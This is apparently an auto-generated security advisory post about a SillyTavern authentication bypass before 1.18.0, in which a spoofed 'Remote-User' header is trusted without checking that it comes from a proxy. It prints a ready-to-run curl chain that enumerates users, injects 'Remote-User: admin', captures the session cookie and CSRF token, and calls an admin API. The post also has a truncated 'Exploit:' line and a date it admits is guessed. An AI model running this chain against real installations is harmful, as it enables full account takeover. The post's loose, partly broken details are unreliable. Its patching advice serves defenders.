Listen to this Post
How the vulnerability works: SillyTavern before 1.18.0 allows SSO via `Remote-User` (Authelia) or `X-Authentik-Username` (Authentik) headers. When `sso.autheliaAuth` or `sso.authentikAuth` is enabled, the `/login` endpoint calls `headerUserLogin()` which reads the header using request.get(header). Express does not distinguish between headers from a trusted proxy vs direct client injection. An attacker can send a crafted HTTP request with `Remote-User: admin` directly to the SillyTavern port. The function then creates an authenticated session without any password. Additionally, `/api/users/list` is publicly accessible (no authentication required) due to being registered before requireLoginMiddleware. This allows attackers to enumerate all usernames, including admin handles. With a valid handle, the attacker injects the header, receives a session cookie, obtains a CSRF token, and calls privileged admin APIs. The flaw exists because there is no IP allowlist or validation that the header originates from a trusted reverse proxy. The default configuration has SSO disabled, but if enabled, any network client that can reach the SillyTavern port can exploit this. The fix in 1.18.0 adds a configurable IP restriction, defaulting to loopback only.
Platform: SillyTavern
Version: before 1.18.0
Vulnerability: header injection auth bypass
Severity: critical
date: 2025-01-15 (based on context)
Prediction: already patched (1.18.0)
What Undercode Say:
Enumerate users
curl -s -X POST http://target:8000/api/users/list -H "Content-Type: application/json" -d '{}'
Inject Remote-User header to hijack admin session
curl -s -L -H "Remote-User: admin" -c session.txt http://target:8000/login
Get CSRF token
TOKEN=$(curl -s -b session.txt http://target:8000/csrf-token | jq -r '.token')
Call admin API
curl -s -X POST http://target:8000/api/users/admin/get -H "Content-Type: application/json" -H "X-CSRF-Token: $TOKEN" -b session.txt -d '{}'
Exploit:
Send `Remote-User:
Protection from this CVE:
Upgrade to SillyTavern 1.18.0 or later. Enable `sso.trustedProxyIPs` and restrict to loopback. Disable SSO if not used. Use reverse proxy with header stripping.
Impact:
Full account takeover. Attacker gains admin privileges, can modify system, access all data, and execute arbitrary actions as any user.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

